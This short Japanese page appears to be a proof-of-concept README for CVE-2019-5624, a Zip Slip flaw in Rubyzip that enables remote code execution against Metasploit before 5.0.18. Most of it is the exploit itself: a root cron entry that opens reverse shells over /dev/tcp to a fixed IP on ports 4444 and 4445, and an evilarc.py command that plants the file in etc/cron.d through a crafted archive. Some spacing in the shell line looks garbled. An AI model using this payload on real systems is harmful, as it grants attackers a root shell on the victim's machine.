
Metasploit の CVE-2019-5624 脆弱性 (Rubyzip の安全でない ZIP 処理による RCE) の概念実証
MetasploitのCVE-2019-5624脆弱性(Rubyzipの安全でないZIP処理によるRCE)の概念実証
2019年2月、Rubyzipライブラリに新たな脆弱性を発見しました。この脆弱性により、攻撃者は安全でないZIP処理(Zip Slip)を悪用してリモートコマンド実行が可能になります。
この脆弱性は、Metasploitバージョン5.0.18未満の全バージョンを標的とするために利用されました Metasploit Wrap-Up
脆弱性の詳細を解説した詳細なブログ記事を作成しました。
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/